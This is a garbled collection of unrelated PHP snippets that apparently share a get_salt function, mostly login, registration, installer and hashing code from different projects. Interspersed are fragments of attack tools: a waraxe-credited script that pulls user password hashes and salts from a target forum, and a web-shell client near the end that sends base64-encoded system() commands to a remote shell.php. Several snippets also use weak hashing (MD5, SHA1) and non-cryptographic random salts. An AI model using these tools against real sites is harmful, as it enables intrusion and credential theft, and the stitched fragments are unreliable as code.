function end_meeting()
{
return bigbluebuttonbn_getEndMeetingURL(get_meetingid(), get_modpassword(), get_url(), get_salt());
//$curl = curl_init();
//curl_setopt($curl, CURLOPT_URL, $end_url);
//$result = curl_exec($curl);
//echo $result;
}
function get_share_id($ip, $saltfile, $visitfile)
{
$index = crypt($ip, get_salt($saltfile));
$visits = get_visits($index, $visitfile);
if ($visits != null and isset($visits['ans'][$index])) {
return $index . '-' . sizeof($visits['ans'][$index]);
} else {
return 0;
}
}
function get_proper_invitation($username, $requested_username)
{
$salt = get_salt($username);
$time = date('m');
$hashedTxt = sha1($salt . $username . $requested_username);
$invite = $hashedTxt . $username;
$checksum = get_checksum($invite);
$invite = $invite . $checksum;
return $invite;
}
public function login()
{
//post
$param['username'] = $this->input->post('username', TRUE) ? $this->input->post('username', TRUE) : "";
$param['password'] = $this->input->post('password', TRUE) ? hash('sha1', $this->input->post('password', TRUE) . get_salt()) : "";
//end post
$data['result'] = "r1";
$data['result_message'] = "";
if ($param['username'] == "") {
$data['result'] = "r2";
$data['result_message'] .= "Username must be filled. <br/>";
}
if ($param['password'] == "") {
$data['result'] = "r2";
$data['result_message'] .= "Password must be filled. <br/>";
}
if ($data['result'] == "r1") {
$param_check['username'] = $param['username'];
$result_check = $this->Model_admin->get_data($param_check);
if ($result_check->num_rows() > 0) {
//Get Username Detail
$id = $result_check->row()->id;
$active = $result_check->row()->active;
$password = $result_check->row()->password;
$id_role = $result_check->row()->id_role;
$role_name = $result_check->row()->role_name;
//End Get Username Detail
if ($active == 0) {
$data['result'] = "r2";
$data['result_message'] .= 'Username is not active. <br/>';
} else {
if ($param['password'] != $password) {
$data['result'] = "r2";
$data['result_message'] .= 'Username and Password are not match.<br/>';
} else {
//Set Session Login
$sess_login = array('id' => $id, 'username' => $param['username'], 'id_role' => $id_role, 'role' => $role_name, 'logged_in' => TRUE);
$this->session->set_userdata($sess_login);
//End Set Session Login
}
}
} else {
$data['result'] = "r2";
$data['result_message'] .= 'Username is not exist. <br/>';
}
}
echo json_encode($data);
}
function edit_data($param)
{
//Set Param
$id = isset($param['id']) ? $param['id'] : 0;
$id_role = isset($param['id_role']) ? $param['id_role'] : 0;
$password = isset($param['password']) ? $param['password'] : "";
$active = isset($param['active']) ? $param['active'] : 0;
//End Set Param
if ($password == "") {
$data = array('id_role' => $id_role, 'active' => $active, 'modtime' => date('Y-m-d H:i:s'), 'modby' => $this->session->userdata('username'));
} else {
$data = array('id_role' => $id_role, 'password' => hash('sha1', $password . get_salt()), 'active' => $active, 'modtime' => date('Y-m-d H:i:s'), 'modby' => $this->session->userdata('username'));
}
$this->db->where('id', $id);
$this->db->update('admin', $data);
}
function new_session($username, $password)
{
do {
$random_var = get_random();
} while (preg_match("/[^a-f0-4]/", $random_var));
$clear = $username . $password . $random_var;
$salt = get_salt();
$result = '';
for ($i = 0; $i < strlen($clear); $i++) {
for ($j = 0; $j < strlen($salt); $j++, $i++) {
$result .= $clear[$i] ^ $salt[$j];
}
}
$result = khkh($result);
$session = strtolower($result);
return $session;
}
<?php
include 'includes/file.php';
if (isset($_GET['false'])) {
add_visit(crypt($_SERVER['REMOTE_ADDR'], get_salt('./data/salt.sav')), './data/visits.sav', true);
echo "n";
} elseif (isset($_GET['ans'])) {
add_visit(crypt($_SERVER['REMOTE_ADDR'], get_salt('./data/salt.sav')), './data/visits.sav', false, $_GET['ans']);
echo "s";
}
function password_dohash($password, $salt)
{
$salt = $salt ? $salt : get_salt();
return md5(md5($password) . $salt);
}
/**
* 安装过程
*/
public function process()
{
$this->load->helper('form');
$this->load->library('form_validation');
$data['item']['dbhost'] = $this->input->post('dbhost') ? $this->input->post('dbhost') : 'localhost';
$data['item']['port'] = $this->input->post('port') ? $this->input->post('port') : '3306';
$data['item']['dbprefix'] = $this->input->post('dbprefix') ? $this->input->post('dbprefix') : 'stb_';
$data['item']['username'] = $this->input->post('username') ? $this->input->post('username') : 'admin';
$data['item']['email'] = $this->input->post('email') ? $this->input->post('email') : '*****@*****.**';
if ($this->form_validation->run() === TRUE) {
$dbhost = $this->input->post('dbhost');
$dbuser = $this->input->post('dbuser');
$dbpsw = $this->input->post('dbpsw');
$dbname = $this->input->post('dbname');
$port = $this->input->post('port');
$dbprefix = $this->input->post('dbprefix');
$salt = get_salt();
$password = password_dohash($this->input->post('password'), $salt);
$admin = array('group_type' => 0, 'gid' => 1, 'is_active' => 1, 'username' => $this->input->post('username'), 'password' => $password, 'salt' => $salt, 'email' => $this->input->post('email'), 'regtime' => time(), 'ip' => get_onlineip());
if (function_exists(@mysqli_connect)) {
$con = mysqli_connect($dbhost, $dbuser, $dbpsw, $dbname, $port);
} else {
$con = mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpsw);
}
//检查数据库信息是否正确
if (!$con) {
$string = '
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script>
alert("无法访问数据库,请重新安装!");
top.location="' . site_url('install') . '";
</script>
';
exit($string);
}
//写入数据库配置文件
$this->_writeDBConfig($dbhost, $dbuser, $dbpsw, $dbname, $port, $dbprefix);
//创建数据表
$this->_createTables($dbhost, $dbuser, $dbpsw, $dbname, $port, $dbprefix, $con);
//禁止安装的文件
file_put_contents(FCPATH . 'install.lock', time());
//写入config文件
$sub_folder = $this->input->post('base_url');
if ($sub_folder) {
$this->config->update('myconfig', 'sub_folder', $sub_folder);
}
$encryption_key = md5(uniqid());
if ($encryption_key) {
$this->config->update('myconfig', 'encryption_key', $encryption_key);
}
sleep(1);
//添加管理员
$this->load->database();
$this->load->model('user_m');
$this->user_m->register($admin);
//update stats
$this->db->set('value', 1)->where('item', 'total_users')->update('site_stats');
$this->db->set('value', 1)->where('item', 'last_uid')->update('site_stats');
$this->user_m->login($admin);
$this->load->view('install_done');
} else {
$this->load->view('install_process', $data);
}
}
function encriptar_con_sal($clave, $metodo, $sal = null)
{
if (version_compare(PHP_VERSION, '5.3.2') >= 0 || $metodo == 'bcrypt') {
$hasher = new toba_hash($metodo);
if (is_null($sal)) {
//Hash nuevo
return $hasher->hash($clave);
} else {
//Verificacion
$resultado = $hasher->get_hash_verificador($clave, $sal);
if (strlen($resultado) > 13) {
//Si es menor a 13 hubo error, puede ser que el hash
return $resultado;
//se hubiera generado con el metodo anterior
}
}
}
if (is_null($sal)) {
$sal = get_salt();
} else {
$sal = substr($sal, 0, 10);
}
return $sal . hash($metodo, $sal . $clave);
}
function askSalt($login, $lang)
{
global $PHP_SELF;
global $DBHost, $DBUserName, $DBPassword, $DBName;
global $AcceptUnknownUser;
setMsgLanguage($lang);
$link = mysqli_connect($DBHost, $DBUserName, $DBPassword) or die(errorMsgBlock(3004, 'main', $DBHost, $DBUserName));
mysqli_select_db($link, $DBName) or die(errorMsgBlock(3005, 'main', $DBName, $DBHost, $DBUserName));
$login = mysqli_real_escape_string($link, $login);
$query = "SELECT Password FROM user WHERE Login='******'";
$result = mysqli_query($link, $query) or die(errorMsgBlock(3006, $query, 'main', $DBName, $DBHost, $DBUserName, mysqli_error($link)));
if (mysqli_num_rows($result) != 1) {
if ($AcceptUnknownUser) {
// just accept the client and return a default salk
echo "1:AA";
die;
} else {
die(errorMsgBlock(2001, $login, 'askSalt'));
// Check if this is not an unconfirmed account
/*$query = "SELECT GamePassword, Language FROM signup_data WHERE login='******'";
$result = mysqli_query($link, $query) or die (errorMsgBlock(3006, $query, 'main', $DBName, $DBHost, $DBUserName, mysqli_error($link)));
if (mysqli_num_rows($result) == 0)
{
// no user record, reject it
die (errorMsgBlock(2001, $login, 'askSalt'));
}
else if (mysqli_num_rows($result) == 1)
{
// one unconfirmed record, let the client send the encrypted password to get the corresponding email address
$row = mysqli_fetch_assoc($result);
$salt = substr($row['GamePassword'], 0, 2);
}
else
{
if ($lang == 'unknown')
{
// several matching records => display a multi-language message now
$languages = array();
while ($row = mysqli_fetch_assoc($result))
{
$languages[$row['Language']] = true;
}
setMsgLanguage(array_keys($languages));
}
die (errorMsgBlock(2003));
}*/
}
} else {
$res_array = mysqli_fetch_assoc($result);
$salt = get_salt($res_array['Password']);
}
echo "1:" . $salt;
mysqli_close($link);
}
} else {
// Let's try to maximize our chances without CLI
@set_time_limit(0);
}
}
//=====================================================================
xecho("Target: {$url}\n");
xecho("Sql table prefix: {$prefix}\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");
$hash = get_hash();
$salt = get_salt();
add_line("Target: {$url}");
add_line("User ID: {$id}");
add_line("Hash: {$hash}");
add_line("Salt: {$salt}");
add_line("------------------------------------------");
xecho("\n------------------------------------------\n");
xecho("Hash: {$hash}\n");
xecho("Salt: {$salt}");
xecho("\n------------------------------------------\n");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
/**
* 用户登录
* @return bool
*/
function z_login($username)
{
$_SESSION["user"]["status"] = TRUE;
$_SESSION["user"]["name"] = "{$username}";
$_SESSION["user"]["token"] = get_salt(100);
}
public function refresh($id)
{
global $table_prefix;
$id = intval($id);
$key = get_salt(100);
$seckey = get_salt(100);
if (!$this->isExistID($id)) {
return FALSE;
}
try {
$sth = $this->dbh->prepare("UPDATE {$table_prefix}apps SET `key`= :key, `seckey`= :seckey WHERE `id` = :id");
$sth->bindParam(':key', $key);
$sth->bindParam(':seckey', $seckey);
$sth->bindParam(':id', $id);
$sth->execute();
if (!($sth->rowCount() > 0)) {
return FALSE;
} else {
return TRUE;
}
} catch (PDOExecption $e) {
echo "<br>Error: " . $e->getMessage();
}
}
public function resetpwd()
{
$this->load->helper('form');
$array = explode('.', base64_decode(@$_GET['p']));
$data = $this->user_m->getpwd_by_username($array['0']);
//$sql = "select passwords from member where username = '******'0'])."'";
$checkCode = md5($array['0'] . '+') . @$data['password'];
if (@$array['1'] === $checkCode) {
if ($this->form_validation->run() === TRUE) {
$salt = get_salt();
$password = password_dohash($this->input->post('password'), $salt);
if ($this->user_m->update_user(@$data['uid'], array('password' => $password, 'salt' => $salt))) {
$this->session->set_userdata(array('uid' => $data['uid'], 'username' => $array['0'], 'group_type' => $data['group_type'], 'gid' => $data['gid']));
redirect('/');
}
}
} else {
show_message('非法重置!!');
}
$data['title'] = '设置新密码';
$data['p'] = $_GET['p'];
$data['csrf_name'] = $this->security->get_csrf_token_name();
$data['csrf_token'] = $this->security->get_csrf_hash();
$this->load->view('findpwd', $data);
}
/**
* registerNewUser
*
* handles the entire registration process. checks all error possibilities, and creates a new user in the database if
* everything is fine
*/
private function registerNewUser()
{
if (empty($_POST['user_name'])) {
$this->errors[] = "Empty Username";
} elseif (empty($_POST['user_password_new']) || empty($_POST['user_password_repeat'])) {
$this->errors[] = "Empty Password";
} elseif ($_POST['user_password_new'] !== $_POST['user_password_repeat']) {
$this->errors[] = "Password and password repeat are not the same";
} elseif (strlen($_POST['user_name']) > 64) {
$this->errors[] = "Username cannot be longer than 64 characters";
} elseif (!preg_match('/^[a-z\\d]{2,64}$/i', $_POST['user_name'])) {
$this->errors[] = "Username does not fit the name sheme: only a-Z and numbers are allowed, 2 to 64 characters";
} elseif (empty($_POST['user_email'])) {
$this->errors[] = "Email cannot be empty";
} elseif (strlen($_POST['user_email']) > 64) {
$this->errors[] = "Email cannot be longer than 64 characters";
} elseif (!filter_var($_POST['user_email'], FILTER_VALIDATE_EMAIL)) {
$this->errors[] = "Your email adress is not in a valid email format";
} elseif (!empty($_POST['user_name']) && strlen($_POST['user_name']) <= 64 && preg_match('/^[a-z\\d]{2,64}$/i', $_POST['user_name']) && !empty($_POST['user_email']) && strlen($_POST['user_email']) <= 64 && filter_var($_POST['user_email'], FILTER_VALIDATE_EMAIL) && !empty($_POST['user_password_new']) && !empty($_POST['user_password_repeat']) && $_POST['user_password_new'] === $_POST['user_password_repeat']) {
// TODO: the above check is redundand, but from a developer's perspective it makes clear
// what exactly we want to reach to go into this if-block
// creating a database connection
$this->db_connection = new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
// if no connection errors (= working database connection)
if (!$this->db_connection->connect_errno) {
// escapin' this
$this->user_name = $this->db_connection->real_escape_string($_POST['user_name']);
$this->user_password = $this->db_connection->real_escape_string($_POST['user_password_new']);
$this->user_email = $this->db_connection->real_escape_string($_POST['user_email']);
// cut password to 1024 chars to prevent too much calculation
$this->user_password = substr($this->user_password, 0, 1024);
/*
* get_salt()
* generate random string "salt", a string to "encrypt" the password hash
* this is a basic salt, you might replace this with a more advanced function
* @see http://en.wikipedia.org/wiki/Salt_(cryptography)
*/
function get_salt($length)
{
$options = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789./';
$salt = '';
for ($i = 0; $i <= $length; $i++) {
$options = str_shuffle($options);
$salt .= $options[rand(0, 63)];
}
return $salt;
}
// getting the max salt length on your system (usually 123 characters on linux)
$max_salt = CRYPT_SALT_LENGTH;
// hard to explain, this part of the upcoming hash string is some kind of parameter, defining
// the intensity of calculation. we are using the SHA-512 algorithm here, please see
// @see php.net/manual/en/function.crypt.php
// for more information.
$hashing_algorithm = '$6$rounds=5000$';
//get the longest salt, could set to 22 crypt ignores extra data
$salt = get_salt($max_salt);
//append salt data to the password, and crypt using salt, results in a 118 character output
$this->user_password_hash = crypt($this->user_password, $hashing_algorithm . $salt);
// check if user already exists
$query_check_user_name = $this->db_connection->query("SELECT * FROM users WHERE user_name = '" . $this->user_name . "';");
if ($query_check_user_name->num_rows == 1) {
$this->errors[] = "Sorry, that user name is already taken.<br/>Please choose another one.";
} else {
// write new users data into database
$query_new_user_insert = $this->db_connection->query("INSERT INTO users (user_name, user_password_hash, user_email) VALUES('" . $this->user_name . "', '" . $this->user_password_hash . "', '" . $this->user_email . "');");
if ($query_new_user_insert) {
$this->messages[] = "Your account has been created successfully. You can now log in.";
$this->registration_successful = true;
} else {
$this->errors[] = "Sorry, your registration failed. Please go back and try again.";
}
}
} else {
$this->errors[] = "Sorry, no database connection.";
}
} else {
$this->errors[] = "An unknown error occured.";
}
}
public function updateVerifyToken($token, $type, $id)
{
global $table_prefix;
$id = intval($id);
$type = intval($type);
$token = trim($token);
if ($type != 1 && $type != 2) {
return FALSE;
}
$verify_token = json_encode(array("{$type}", get_salt(100)));
$check_token = json_encode(array("0", "{$token}"));
$time = get_time();
if (!$this->isExistID($id)) {
return FALSE;
}
try {
$sth = $this->dbh->prepare("UPDATE {$table_prefix}users_temp SET `verify_token`= :verify_token, `time`= :time WHERE `id` = :id AND `verify_token` = :check_token");
$sth->bindParam(':verify_token', $verify_token);
$sth->bindParam(':time', $time);
$sth->bindParam(':id', $id);
$sth->bindParam(':check_token', $check_token);
$sth->execute();
if (!($sth->rowCount() > 0)) {
return FALSE;
} else {
return TRUE;
}
} catch (PDOExecption $e) {
echo "<br>Error: " . $e->getMessage();
}
}
function verificar_desafio_secreto($datos_usuario)
{
$datos = $this->recuperar_pregunta_secreta($this->s__usuario);
if (!is_null($datos)) {
$salt = get_salt();
$clave1 = encriptar_con_sal(trim($datos['respuesta']), 'SHA256', $salt);
$clave2 = encriptar_con_sal(trim($datos_usuario['respuesta']), 'SHA256', $salt);
if ($clave1 !== $clave2) {
toba::logger()->error("Se intento cambiar la clave al usuario: {$this->s__usuario} pero falló la respuesta al desafío");
throw new toba_error('Respuesta no Válida');
}
}
}
login_to_forum($argv[4], $argv[5]);
}
$i = $chosen_id;
echo "Fetching topics from ID {$i}\n";
if (!fetch_target_id($i)) {
echo "No topics found.\n";
fwrite(STDOUT, "Last ditch effort, enter topic: ");
$topicname = trim(fgets(STDIN));
} else {
echo "Topic found! Hacktime.\n";
}
// Check chosen option and proceed accordingly
add_line("------------------------------------------");
if ($ch_option == 2) {
$hash = get_hash($i);
$salt = get_salt($i);
$line = "{$i}:{$hash}:{$salt}";
add_line($line);
xecho("\n------------------------------------------\n");
xecho("User ID: {$i}\n");
xecho("Hash: {$hash}\n");
xecho("Salt: {$salt}");
xecho("\n------------------------------------------\n");
} else {
if ($ch_option == 1) {
$uname = get_user($i);
$line = "The username for id {$i} is {$uname}";
add_line($line);
xecho("{$uname}");
}
}
/**
* Determine if the password is correct and salt it if it hasn't been already
*
* @param string $userID The user ID to check the password against
* @param string $passwd The password the visitor sent
*
* @return bool True if password was correct and properly salted, otherwise false
*/
function valid_passwd($userID, $passwd)
{
$dbh = DB::connect();
if ($passwd == "") {
return false;
}
/* Get salt for this user. */
$salt = get_salt($userID);
if ($salt) {
$q = "SELECT ID FROM Users ";
$q .= "WHERE ID = " . $userID . " ";
$q .= "AND Passwd = " . $dbh->quote(salted_hash($passwd, $salt));
$result = $dbh->query($q);
if (!$result) {
return false;
}
$row = $result->fetch(PDO::FETCH_NUM);
return $row[0] > 0;
} else {
/* Check password without using salt. */
$q = "SELECT ID FROM Users ";
$q .= "WHERE ID = " . $userID . " ";
$q .= "AND Passwd = " . $dbh->quote(md5($passwd));
$result = $dbh->query($q);
if (!$result) {
return false;
}
$row = $result->fetch(PDO::FETCH_NUM);
if (!$row[0]) {
return false;
}
/* Password correct, but salt it first! */
if (!save_salt($userID, $passwd)) {
trigger_error("Unable to salt user's password;" . " ID " . $userID, E_USER_WARNING);
return false;
}
return true;
}
}
<?php
if (!isset($argv[1]) || !isset($argv[2])) {
echo "{$argv[0]} http://localhost/shell.php pass\n";
exit;
}
while (1) {
fwrite(STDOUT, "SHELL> ");
$command = trim(fgets(STDIN));
if ($command == 'exit') {
break;
}
$salt = get_salt(10);
if (!is_bool(stripos($argv[1], '?'))) {
$url = $argv[1] . "&{$argv[2]}=" . urlencode("system(base64_decode(\$_GET[365234]));") . "&365234=" . urlencode(base64_encode("echo {$salt};{$command};echo {$salt};"));
} else {
$url = $argv[1] . "?{$argv[2]}=" . urlencode("system(base64_decode(\$_GET[365234]));") . "&365234=" . urlencode(base64_encode("echo {$salt};{$command};echo {$salt};"));
}
$resp = file_get_contents($url);
$resp_arr = split($salt, $resp);
if (count($resp_arr) >= 3) {
echo $resp_arr[1] . "\n";
} else {
echo "错误:执行失败.\n";
}
}
function get_salt($length = 8)
{
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$salt = '';
for ($i = 0; $i < $length; $i++) {
